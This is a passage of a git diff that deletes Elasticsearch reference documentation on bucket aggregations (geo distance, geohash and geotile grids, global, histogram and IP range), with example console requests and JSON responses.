calculation is the most accurate. The `plane` is the fastest but least accurate. Consider using `plane` when your search context is "narrow", and spans smaller geographical areas (~5km). `plane` will return higher error margins for searches across very large areas (e.g. cross continent search). The distance calculation type can be set using the `distance_type` parameter: - -[source,console] --------------------------------------------------- -POST /museums/_search?size=0 -{ - "aggs": { - "rings": { - "geo_distance": { - "field": "location", - "origin": "52.3760, 4.894", - "unit": "km", - "distance_type": "plane", - "ranges": [ - { "to": 100 }, - { "from": 100, "to": 300 }, - { "from": 300 } - ] - } - } - } -} --------------------------------------------------- -// TEST[continued] - -==== Keyed Response - -Setting the `keyed` flag to `true` will associate a unique string key with each bucket and return the ranges as a hash rather than an array: - -[source,console] --------------------------------------------------- -POST /museums/_search?size=0 -{ - "aggs": { - "rings_around_amsterdam": { - "geo_distance": { - "field": "location", - "origin": "52.3760, 4.894", - "ranges": [ - { "to": 100000 }, - { "from": 100000, "to": 300000 }, - { "from": 300000 } - ], - "keyed": true - } - } - } -} --------------------------------------------------- -// TEST[continued] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "rings_around_amsterdam": { - "buckets": { - "*-100000.0": { - "from": 0.0, - "to": 100000.0, - "doc_count": 3 - }, - "100000.0-300000.0": { - "from": 100000.0, - "to": 300000.0, - "doc_count": 1 - }, - "300000.0-*": { - "from": 300000.0, - "doc_count": 2 - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"_shards": $body._shards,"hits":$body.hits,"timed_out":false,/] - -It is also possible to customize the key for each range: - -[source,console] --------------------------------------------------- -POST /museums/_search?size=0 -{ - "aggs": { - "rings_around_amsterdam": { - "geo_distance": { - "field": "location", - "origin": "52.3760, 4.894", - "ranges": [ - { "to": 100000, "key": "first_ring" }, - { "from": 100000, "to": 300000, "key": "second_ring" }, - { "from": 300000, "key": "third_ring" } - ], - "keyed": true - } - } - } -} --------------------------------------------------- -// TEST[continued] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "rings_around_amsterdam": { - "buckets": { - "first_ring": { - "from": 0.0, - "to": 100000.0, - "doc_count": 3 - }, - "second_ring": { - "from": 100000.0, - "to": 300000.0, - "doc_count": 1 - }, - "third_ring": { - "from": 300000.0, - "doc_count": 2 - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"_shards": $body._shards,"hits":$body.hits,"timed_out":false,/] - diff --git a/docs/reference/aggregations/bucket/geohashgrid-aggregation.asciidoc b/docs/reference/aggregations/bucket/geohashgrid-aggregation.asciidoc deleted file mode 100644 index 953c525627c..00000000000 --- a/docs/reference/aggregations/bucket/geohashgrid-aggregation.asciidoc +++ /dev/null @@ -1,312 +0,0 @@ -[[search-aggregations-bucket-geohashgrid-aggregation]] -=== Geohash grid aggregation -++++ -Geohash grid -++++ - -A multi-bucket aggregation that works on `geo_point` fields and groups points into buckets that represent cells in a grid. -The resulting grid can be sparse and only contains cells that have matching data. Each cell is labeled using a {wikipedia}/Geohash[geohash] which is of user-definable precision. - -* High precision geohashes have a long string length and represent cells that cover only a small area. -* Low precision geohashes have a short string length and represent cells that each cover a large area. - -Geohashes used in this aggregation can have a choice of precision between 1 and 12. - -WARNING: The highest-precision geohash of length 12 produces cells that cover less than a square metre of land and so high-precision requests can be very costly in terms of RAM and result sizes. -Please see the example below on how to first filter the aggregation to a smaller geographic area before requesting high-levels of detail. - -The specified field must be of type `geo_point` (which can only be set explicitly in the mappings) and it can also hold an array of `geo_point` fields, in which case all points will be taken into account during aggregation. - - -==== Simple low-precision request - -[source,console] --------------------------------------------------- -PUT /museums -{ - "mappings": { - "properties": { - "location": { - "type": "geo_point" - } - } - } -} - -POST /museums/_bulk?refresh -{"index":{"_id":1}} -{"location": "52.374081,4.912350", "name": "NEMO Science Museum"} -{"index":{"_id":2}} -{"location": "52.369219,4.901618", "name": "Museum Het Rembrandthuis"} -{"index":{"_id":3}} -{"location": "52.371667,4.914722", "name": "Nederlands Scheepvaartmuseum"} -{"index":{"_id":4}} -{"location": "51.222900,4.405200", "name": "Letterenhuis"} -{"index":{"_id":5}} -{"location": "48.861111,2.336389", "name": "Musée du Louvre"} -{"index":{"_id":6}} -{"location": "48.860000,2.327000", "name": "Musée d'Orsay"} - -POST /museums/_search?size=0 -{ - "aggregations": { - "large-grid": { - "geohash_grid": { - "field": "location", - "precision": 3 - } - } - } -} --------------------------------------------------- - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "large-grid": { - "buckets": [ - { - "key": "u17", - "doc_count": 3 - }, - { - "key": "u09", - "doc_count": 2 - }, - { - "key": "u15", - "doc_count": 1 - } - ] - } -} -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"_shards": $body._shards,"hits":$body.hits,"timed_out":false,/] - -==== High-precision requests - -When requesting detailed buckets (typically for displaying a "zoomed in" map) a filter like <> should be applied to narrow the subject area otherwise potentially millions of buckets will be created and returned. - -[source,console] --------------------------------------------------- -POST /museums/_search?size=0 -{ - "aggregations": { - "zoomed-in": { - "filter": { - "geo_bounding_box": { - "location": { - "top_left": "52.4, 4.9", - "bottom_right": "52.3, 5.0" - } - } - }, - "aggregations": { - "zoom1": { - "geohash_grid": { - "field": "location", - "precision": 8 - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -The geohashes returned by the `geohash_grid` aggregation can be also used for zooming in. To zoom into the -first geohash `u17` returned in the previous example, it should be specified as both `top_left` and `bottom_right` corner: - -[source,console] --------------------------------------------------- -POST /museums/_search?size=0 -{ - "aggregations": { - "zoomed-in": { - "filter": { - "geo_bounding_box": { - "location": { - "top_left": "u17", - "bottom_right": "u17" - } - } - }, - "aggregations": { - "zoom1": { - "geohash_grid": { - "field": "location", - "precision": 8 - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "zoomed-in": { - "doc_count": 3, - "zoom1": { - "buckets": [ - { - "key": "u173zy3j", - "doc_count": 1 - }, - { - "key": "u173zvfz", - "doc_count": 1 - }, - { - "key": "u173zt90", - "doc_count": 1 - } - ] - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"_shards": $body._shards,"hits":$body.hits,"timed_out":false,/] - -For "zooming in" on the system that don't support geohashes, the bucket keys should be translated into bounding boxes using -one of available geohash libraries. For example, for javascript the https://github.com/sunng87/node-geohash[node-geohash] library -can be used: - -[source,js] --------------------------------------------------- -var geohash = require('ngeohash'); - -// bbox will contain [ 52.03125, 4.21875, 53.4375, 5.625 ] -// [ minlat, minlon, maxlat, maxlon] -var bbox = geohash.decode_bbox('u17'); --------------------------------------------------- -// NOTCONSOLE - -==== Requests with additional bounding box filtering - -The `geohash_grid` aggregation supports an optional `bounds` parameter -that restricts the points considered to those that fall within the -bounds provided. The `bounds` parameter accepts the bounding box in -all the same <> of the -bounds specified in the Geo Bounding Box Query. This bounding box can be used with or -without an additional `geo_bounding_box` query filtering the points prior to aggregating. -It is an independent bounding box that can intersect with, be equal to, or be disjoint -to any additional `geo_bounding_box` queries defined in the context of the aggregation. - -[source,console,id=geohashgrid-aggregation-with-bounds] --------------------------------------------------- -POST /museums/_search?size=0 -{ - "aggregations": { - "tiles-in-bounds": { - "geohash_grid": { - "field": "location", - "precision": 8, - "bounds": { - "top_left": "53.4375, 4.21875", - "bottom_right": "52.03125, 5.625" - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "tiles-in-bounds": { - "buckets": [ - { - "key": "u173zy3j", - "doc_count": 1 - }, - { - "key": "u173zvfz", - "doc_count": 1 - }, - { - "key": "u173zt90", - "doc_count": 1 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"_shards": $body._shards,"hits":$body.hits,"timed_out":false,/] - -==== Cell dimensions at the equator -The table below shows the metric dimensions for cells covered by various string lengths of geohash. -Cell dimensions vary with latitude and so the table is for the worst-case scenario at the equator. - -[horizontal] -*GeoHash length*:: *Area width x height* -1:: 5,009.4km x 4,992.6km -2:: 1,252.3km x 624.1km -3:: 156.5km x 156km -4:: 39.1km x 19.5km -5:: 4.9km x 4.9km -6:: 1.2km x 609.4m -7:: 152.9m x 152.4m -8:: 38.2m x 19m -9:: 4.8m x 4.8m -10:: 1.2m x 59.5cm -11:: 14.9cm x 14.9cm -12:: 3.7cm x 1.9cm - - -[discrete] -[role="xpack"] -==== Aggregating `geo_shape` fields - -Aggregating on <> fields works just as it does for points, except that a single -shape can be counted for in multiple tiles. A shape will contribute to the count of matching values -if any part of its shape intersects with that tile. Below is an image that demonstrates this: - - -image:images/spatial/geoshape_grid.png[] - -==== Options - -[horizontal] -field:: Mandatory. The name of the field indexed with GeoPoints. - -precision:: Optional. The string length of the geohashes used to define - cells/buckets in the results. Defaults to 5. - The precision can either be defined in terms of the integer - precision levels mentioned above. Values outside of [1,12] will - be rejected. - Alternatively, the precision level can be approximated from a - distance measure like "1km", "10m". The precision level is - calculate such that cells will not exceed the specified - size (diagonal) of the required precision. When this would lead - to precision levels higher than the supported 12 levels, - (e.g. for distances <5.6cm) the value is rejected. - -bounds:: Optional. The bounding box to filter the points in the bucket. - -size:: Optional. The maximum number of geohash buckets to return - (defaults to 10,000). When results are trimmed, buckets are - prioritised based on the volumes of documents they contain. - -shard_size:: Optional. To allow for more accurate counting of the top cells - returned in the final result the aggregation defaults to - returning `max(10,(size x number-of-shards))` buckets from each - shard. If this heuristic is undesirable, the number considered - from each shard can be over-ridden using this parameter. diff --git a/docs/reference/aggregations/bucket/geotilegrid-aggregation.asciidoc b/docs/reference/aggregations/bucket/geotilegrid-aggregation.asciidoc deleted file mode 100644 index e6be07633c0..00000000000 --- a/docs/reference/aggregations/bucket/geotilegrid-aggregation.asciidoc +++ /dev/null @@ -1,255 +0,0 @@ -[[search-aggregations-bucket-geotilegrid-aggregation]] -=== Geotile grid aggregation -++++ -Geotile grid -++++ - -A multi-bucket aggregation that works on `geo_point` fields and groups points into -buckets that represent cells in a grid. The resulting grid can be sparse and only -contains cells that have matching data. Each cell corresponds to a -{wikipedia}/Tiled_web_map[map tile] as used by many online map -sites. Each cell is labeled using a "{zoom}/{x}/{y}" format, where zoom is equal -to the user-specified precision. - -* High precision keys have a larger range for x and y, and represent tiles that -cover only a small area. -* Low precision keys have a smaller range for x and y, and represent tiles that -each cover a large area. - -See https://wiki.openstreetmap.org/wiki/Zoom_levels[Zoom level documentation] -on how precision (zoom) correlates to size on the ground. Precision for this -aggregation can be between 0 and 29, inclusive. - -WARNING: The highest-precision geotile of length 29 produces cells that cover -less than a 10cm by 10cm of land and so high-precision requests can be very -costly in terms of RAM and result sizes. Please see the example below on how -to first filter the aggregation to a smaller geographic area before requesting -high-levels of detail. - -The specified field must be of type `geo_point` (which can only be set -explicitly in the mappings) and it can also hold an array of `geo_point` -fields, in which case all points will be taken into account during aggregation. - - -==== Simple low-precision request - -[source,console] --------------------------------------------------- -PUT /museums -{ - "mappings": { - "properties": { - "location": { - "type": "geo_point" - } - } - } -} - -POST /museums/_bulk?refresh -{"index":{"_id":1}} -{"location": "52.374081,4.912350", "name": "NEMO Science Museum"} -{"index":{"_id":2}} -{"location": "52.369219,4.901618", "name": "Museum Het Rembrandthuis"} -{"index":{"_id":3}} -{"location": "52.371667,4.914722", "name": "Nederlands Scheepvaartmuseum"} -{"index":{"_id":4}} -{"location": "51.222900,4.405200", "name": "Letterenhuis"} -{"index":{"_id":5}} -{"location": "48.861111,2.336389", "name": "Musée du Louvre"} -{"index":{"_id":6}} -{"location": "48.860000,2.327000", "name": "Musée d'Orsay"} - -POST /museums/_search?size=0 -{ - "aggregations": { - "large-grid": { - "geotile_grid": { - "field": "location", - "precision": 8 - } - } - } -} --------------------------------------------------- - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "large-grid": { - "buckets": [ - { - "key": "8/131/84", - "doc_count": 3 - }, - { - "key": "8/129/88", - "doc_count": 2 - }, - { - "key": "8/131/85", - "doc_count": 1 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"_shards": $body._shards,"hits":$body.hits,"timed_out":false,/] - -==== High-precision requests - -When requesting detailed buckets (typically for displaying a "zoomed in" map) -a filter like <> should be -applied to narrow the subject area otherwise potentially millions of buckets -will be created and returned. - -[source,console] --------------------------------------------------- -POST /museums/_search?size=0 -{ - "aggregations": { - "zoomed-in": { - "filter": { - "geo_bounding_box": { - "location": { - "top_left": "52.4, 4.9", - "bottom_right": "52.3, 5.0" - } - } - }, - "aggregations": { - "zoom1": { - "geotile_grid": { - "field": "location", - "precision": 22 - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "zoomed-in": { - "doc_count": 3, - "zoom1": { - "buckets": [ - { - "key": "22/2154412/1378379", - "doc_count": 1 - }, - { - "key": "22/2154385/1378332", - "doc_count": 1 - }, - { - "key": "22/2154259/1378425", - "doc_count": 1 - } - ] - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"_shards": $body._shards,"hits":$body.hits,"timed_out":false,/] - -==== Requests with additional bounding box filtering - -The `geotile_grid` aggregation supports an optional `bounds` parameter -that restricts the points considered to those that fall within the -bounds provided. The `bounds` parameter accepts the bounding box in -all the same <> of the -bounds specified in the Geo Bounding Box Query. This bounding box can be used with or -without an additional `geo_bounding_box` query filtering the points prior to aggregating. -It is an independent bounding box that can intersect with, be equal to, or be disjoint -to any additional `geo_bounding_box` queries defined in the context of the aggregation. - -[source,console,id=geotilegrid-aggregation-with-bounds] --------------------------------------------------- -POST /museums/_search?size=0 -{ - "aggregations": { - "tiles-in-bounds": { - "geotile_grid": { - "field": "location", - "precision": 22, - "bounds": { - "top_left": "52.4, 4.9", - "bottom_right": "52.3, 5.0" - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "tiles-in-bounds": { - "buckets": [ - { - "key": "22/2154412/1378379", - "doc_count": 1 - }, - { - "key": "22/2154385/1378332", - "doc_count": 1 - }, - { - "key": "22/2154259/1378425", - "doc_count": 1 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"_shards": $body._shards,"hits":$body.hits,"timed_out":false,/] - -[discrete] -[role="xpack"] -==== Aggregating `geo_shape` fields - -Aggregating on <> fields works just as it does for points, except that a single -shape can be counted for in multiple tiles. A shape will contribute to the count of matching values -if any part of its shape intersects with that tile. Below is an image that demonstrates this: - - -image:images/spatial/geoshape_grid.png[] - -==== Options - -[horizontal] -field:: Mandatory. The name of the field indexed with GeoPoints. - -precision:: Optional. The integer zoom of the key used to define - cells/buckets in the results. Defaults to 7. - Values outside of [0,29] will be rejected. - -bounds: Optional. The bounding box to filter the points in the bucket. - -size:: Optional. The maximum number of geohash buckets to return - (defaults to 10,000). When results are trimmed, buckets are - prioritised based on the volumes of documents they contain. - -shard_size:: Optional. To allow for more accurate counting of the top cells - returned in the final result the aggregation defaults to - returning `max(10,(size x number-of-shards))` buckets from each - shard. If this heuristic is undesirable, the number considered - from each shard can be over-ridden using this parameter. diff --git a/docs/reference/aggregations/bucket/global-aggregation.asciidoc b/docs/reference/aggregations/bucket/global-aggregation.asciidoc deleted file mode 100644 index 72673586861..00000000000 --- a/docs/reference/aggregations/bucket/global-aggregation.asciidoc +++ /dev/null @@ -1,69 +0,0 @@ -[[search-aggregations-bucket-global-aggregation]] -=== Global aggregation -++++ -Global -++++ - -Defines a single bucket of all the documents within the search execution -context. This context is defined by the indices and the document types you're -searching on, but is *not* influenced by the search query itself. - -NOTE: Global aggregators can only be placed as top level aggregators because - it doesn't make sense to embed a global aggregator within another - bucket aggregator. - -Example: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "query": { - "match": { "type": "t-shirt" } - }, - "aggs": { - "all_products": { - "global": {}, <1> - "aggs": { <2> - "avg_price": { "avg": { "field": "price" } } - } - }, - "t_shirts": { "avg": { "field": "price" } } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> The `global` aggregation has an empty body -<2> The sub-aggregations that are registered for this `global` aggregation - -The above aggregation demonstrates how one would compute aggregations -(`avg_price` in this example) on all the documents in the search context, -regardless of the query (in our example, it will compute the average price over -all products in our catalog, not just on the "shirts"). - -The response for the above aggregation: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "all_products": { - "doc_count": 7, <1> - "avg_price": { - "value": 140.71428571428572 <2> - } - }, - "t_shirts": { - "value": 128.33333333333334 <3> - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -<1> The number of documents that were aggregated (in our case, all documents -within the search context) -<2> The average price of all products in the index -<3> The average price of all t-shirts diff --git a/docs/reference/aggregations/bucket/histogram-aggregation.asciidoc b/docs/reference/aggregations/bucket/histogram-aggregation.asciidoc deleted file mode 100644 index b8621f5c3ba..00000000000 --- a/docs/reference/aggregations/bucket/histogram-aggregation.asciidoc +++ /dev/null @@ -1,413 +0,0 @@ -[[search-aggregations-bucket-histogram-aggregation]] -=== Histogram aggregation -++++ -Histogram -++++ - -A multi-bucket values source based aggregation that can be applied on numeric values or numeric range values extracted -from the documents. It dynamically builds fixed size (a.k.a. interval) buckets over the values. For example, if the -documents have a field that holds a price (numeric), we can configure this aggregation to dynamically build buckets with -interval `5` (in case of price it may represent $5). When the aggregation executes, the price field of every document -will be evaluated and will be rounded down to its closest bucket - for example, if the price is `32` and the bucket size -is `5` then the rounding will yield `30` and thus the document will "fall" into the bucket that is associated with the -key `30`. -To make this more formal, here is the rounding function that is used: - -[source,java] --------------------------------------------------- -bucket_key = Math.floor((value - offset) / interval) * interval + offset --------------------------------------------------- - -For range values, a document can fall into multiple buckets. The first bucket is computed from the lower -bound of the range in the same way as a bucket for a single value is computed. The final bucket is computed in the same -way from the upper bound of the range, and the range is counted in all buckets in between and including those two. - -The `interval` must be a positive decimal, while the `offset` must be a decimal in `[0, interval)` -(a decimal greater than or equal to `0` and less than `interval`) - -The following snippet "buckets" the products based on their `price` by interval of `50`: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "prices": { - "histogram": { - "field": "price", - "interval": 50 - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "prices": { - "buckets": [ - { - "key": 0.0, - "doc_count": 1 - }, - { - "key": 50.0, - "doc_count": 1 - }, - { - "key": 100.0, - "doc_count": 0 - }, - { - "key": 150.0, - "doc_count": 2 - }, - { - "key": 200.0, - "doc_count": 3 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -==== Minimum document count - -The response above show that no documents has a price that falls within the range of `[100, 150)`. By default the -response will fill gaps in the histogram with empty buckets. It is possible change that and request buckets with -a higher minimum count thanks to the `min_doc_count` setting: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "prices": { - "histogram": { - "field": "price", - "interval": 50, - "min_doc_count": 1 - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "prices": { - "buckets": [ - { - "key": 0.0, - "doc_count": 1 - }, - { - "key": 50.0, - "doc_count": 1 - }, - { - "key": 150.0, - "doc_count": 2 - }, - { - "key": 200.0, - "doc_count": 3 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -[[search-aggregations-bucket-histogram-aggregation-extended-bounds]] -By default the `histogram` returns all the buckets within the range of the data itself, that is, the documents with -the smallest values (on which with histogram) will determine the min bucket (the bucket with the smallest key) and the -documents with the highest values will determine the max bucket (the bucket with the highest key). Often, when -requesting empty buckets, this causes a confusion, specifically, when the data is also filtered. - -To understand why, let's look at an example: - -Lets say the you're filtering your request to get all docs with values between `0` and `500`, in addition you'd like -to slice the data per price using a histogram with an interval of `50`. You also specify `"min_doc_count" : 0` as you'd -like to get all buckets even the empty ones. If it happens that all products (documents) have prices higher than `100`, -the first bucket you'll get will be the one with `100` as its key. This is confusing, as many times, you'd also like -to get those buckets between `0 - 100`. - -With `extended_bounds` setting, you now can "force" the histogram aggregation to start building buckets on a specific -`min` value and also keep on building buckets up to a `max` value (even if there are no documents anymore). Using -`extended_bounds` only makes sense when `min_doc_count` is 0 (the empty buckets will never be returned if `min_doc_count` -is greater than 0). - -Note that (as the name suggest) `extended_bounds` is **not** filtering buckets. Meaning, if the `extended_bounds.min` is higher -than the values extracted from the documents, the documents will still dictate what the first bucket will be (and the -same goes for the `extended_bounds.max` and the last bucket). For filtering buckets, one should nest the histogram aggregation -under a range `filter` aggregation with the appropriate `from`/`to` settings. - -Example: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "query": { - "constant_score": { "filter": { "range": { "price": { "to": "500" } } } } - }, - "aggs": { - "prices": { - "histogram": { - "field": "price", - "interval": 50, - "extended_bounds": { - "min": 0, - "max": 500 - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -When aggregating ranges, buckets are based on the values of the returned documents. This means the response may include -buckets outside of a query's range. For example, if your query looks for values greater than 100, and you have a range -covering 50 to 150, and an interval of 50, that document will land in 3 buckets - 50, 100, and 150. In general, it's -best to think of the query and aggregation steps as independent - the query selects a set of documents, and then the -aggregation buckets those documents without regard to how they were selected. -See <> for more information and an example. - -[[search-aggregations-bucket-histogram-aggregation-hard-bounds]] -The `hard_bounds` is a counterpart of `extended_bounds` and can limit the range of buckets in the histogram. It is -particularly useful in the case of open <> that can result in a very large number of buckets. - -Example: - -[source,console,id=histogram-aggregation-hard-bounds-example] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "query": { - "constant_score": { "filter": { "range": { "price": { "to": "500" } } } } - }, - "aggs": { - "prices": { - "histogram": { - "field": "price", - "interval": 50, - "hard_bounds": { - "min": 100, - "max": 200 - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -In this example even though the range specified in the query is up to 500, the histogram will only have 2 buckets starting at 100 and 150. -All other buckets will be omitted even if documents that should go to this buckets are present in the results. - -==== Order - -By default the returned buckets are sorted by their `key` ascending, though the order behaviour can be controlled using -the `order` setting. Supports the same `order` functionality as the <>. - -==== Offset - -By default the bucket keys start with 0 and then continue in even spaced steps -of `interval`, e.g. if the interval is `10`, the first three buckets (assuming -there is data inside them) will be `[0, 10)`, `[10, 20)`, `[20, 30)`. The bucket -boundaries can be shifted by using the `offset` option. - -This can be best illustrated with an example. If there are 10 documents with values ranging from 5 to 14, using interval `10` will result in -two buckets with 5 documents each. If an additional offset `5` is used, there will be only one single bucket `[5, 15)` containing all the 10 -documents. - -==== Response Format - -By default, the buckets are returned as an ordered array. It is also possible to request the response as a hash -instead keyed by the buckets keys: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "prices": { - "histogram": { - "field": "price", - "interval": 50, - "keyed": true - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "prices": { - "buckets": { - "0.0": { - "key": 0.0, - "doc_count": 1 - }, - "50.0": { - "key": 50.0, - "doc_count": 1 - }, - "100.0": { - "key": 100.0, - "doc_count": 0 - }, - "150.0": { - "key": 150.0, - "doc_count": 2 - }, - "200.0": { - "key": 200.0, - "doc_count": 3 - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should be treated. -By default they will be ignored but it is also possible to treat them as if they -had a value. - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "quantity": { - "histogram": { - "field": "quantity", - "interval": 10, - "missing": 0 <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> Documents without a value in the `quantity` field will fall into the same bucket as documents that have the value `0`. - -[[search-aggregations-bucket-histogram-aggregation-histogram-fields]] -==== Histogram fields - -Running a histogram aggregation over histogram fields computes the total number of counts for each interval. - -For example, executing a histogram aggregation against the following index that stores pre-aggregated histograms -with latency metrics (in milliseconds) for different networks: - -[source,console] --------------------------------------------------- -PUT metrics_index/_doc/1 -{ - "network.name" : "net-1", - "latency_histo" : { - "values" : [1, 3, 8, 12, 15], - "counts" : [3, 7, 23, 12, 6] - } -} - -PUT metrics_index/_doc/2 -{ - "network.name" : "net-2", - "latency_histo" : { - "values" : [1, 6, 8, 12, 14], - "counts" : [8, 17, 8, 7, 6] - } -} - -POST /metrics_index/_search?size=0 -{ - "aggs": { - "latency_buckets": { - "histogram": { - "field": "latency_histo", - "interval": 5 - } - } - } -} --------------------------------------------------- - - -The `histogram` aggregation will sum the counts of each interval computed based on the `values` and -return the following output: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "prices": { - "buckets": [ - { - "key": 0.0, - "doc_count": 18 - }, - { - "key": 5.0, - "doc_count": 48 - }, - { - "key": 10.0, - "doc_count": 25 - }, - { - "key": 15.0, - "doc_count": 6 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:test not setup] - -[IMPORTANT] -======== -Histogram aggregation is a bucket aggregation, which partitions documents into buckets rather than calculating metrics over fields like -metrics aggregations do. Each bucket represents a collection of documents which sub-aggregations can run on. -On the other hand, a histogram field is a pre-aggregated field representing multiple values inside a single field: -buckets of numerical data and a count of items/documents for each bucket. This mismatch between the histogram aggregations expected input -(expecting raw documents) and the histogram field (that provides summary information) limits the outcome of the aggregation -to only the doc counts for each bucket. - - -**Consequently, when executing a histogram aggregation over a histogram field, no sub-aggregations are allowed.** -======== - -Also, when running histogram aggregation over histogram field the `missing` parameter is not supported. diff --git a/docs/reference/aggregations/bucket/iprange-aggregation.asciidoc b/docs/reference/aggregations/bucket/iprange-aggregation.asciidoc deleted file mode 100644 index d090eb9f42d..00000000000 --- a/docs/reference/aggregations/bucket/iprange-aggregation.asciidoc +++ /dev/null @@ -1,205 +0,0 @@ -[[search-aggregations-bucket-iprange-aggregation]] -=== IP range aggregation -++++ -IP range -++++ - -Just like the dedicated <> range aggregation, there is also a dedicated range aggregation for IP typed fields: - -Example: - -[source,console] --------------------------------------------------- -GET /ip_addresses/_search -{ - "size": 10, - "aggs": { - "ip_ranges": { - "ip_range": { - "field": "ip", - "ranges": [ - { "to": "10.0.0.5" }, - { "from": "10.0.0.5" } - ] - } - } - } -} --------------------------------------------------- -// TEST[setup:iprange] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - - "aggregations": { - "ip_ranges": { - "buckets": [ - { - "key": "*-10.0.0.5", - "to": "10.0.0.5", - "doc_count": 10 - }, - { - "key": "10.0.0.5-*", - "from": "10.0.0.5", - "doc_count": 260 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -IP ranges can also be defined as CIDR masks: - -[source,console] --------------------------------------------------- -GET /ip_addresses/_search -{ - "size": 0, - "aggs": { - "ip_ranges": { - "ip_range": { - "field": "ip", - "ranges": [ - { "mask": "10.0.0.0/25" }, - { "mask": "10.0.0.127/25" } - ] - } - } - } -} --------------------------------------------------- -// TEST[setup:iprange] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - - "aggregations": { - "ip_ranges": { - "buckets": [ - { - "key": "10.0.0.0/25", - "from": "10.0.0.0", - "to": "10.0.0.128", - "doc_count": 128 - }, - { - "key": "10.0.0.127/25", - "from": "10.0.0.0", - "to": "10.0.0.128", - "doc_count": 128 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -==== Keyed Response - -Setting the `keyed` flag to `true` will associate a unique string key with each bucket and return the ranges as a hash rather than an array: - -[source,console] --------------------------------------------------- -GET /ip_addresses/_search -{ - "size": 0, - "aggs": { - "ip_ranges": { - "ip_range": { - "field": "ip", - "ranges": [ - { "to": "10.0.0.5" }, - { "from": "10.0.0.5" } - ], - "keyed": true - } - } - } -} --------------------------------------------------- -// TEST[setup:iprange] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - - "aggregations": { - "ip_ranges": { - "buckets": { - "*-10.0.0.5": { - "to": "10.0.0.5", - "doc_count": 10 - }, - "10.0.0.5-*": { - "from": "10.0.0.5", - "doc_count": 260 - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -It is also possible to customize the key for each range: - -[source,console] --------------------------------------------------- -GET /ip_addresses/_search -{ - "size": 0, - "aggs": { - "ip_ranges": { - "ip_range": { - "field": "ip", - "ranges": [ - { "key": "infinity", "to": "10.0.0.5" }, - { "key": "and-beyond", "from": "10.0.0.5" } - ], - "keyed": true - } - } - } -} --------------------------------------------------- -// TEST[setup:iprange] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - - "aggregations": { - "ip_ranges": { - "buckets": { - "infinity": { - "to": "10.0.0.5", - "doc_count": 10 - }, - "and-beyond": { - "from": "10.0.0.5", - "doc_count": 260 - } - } - } - } -} --------------------------------------------------- -// 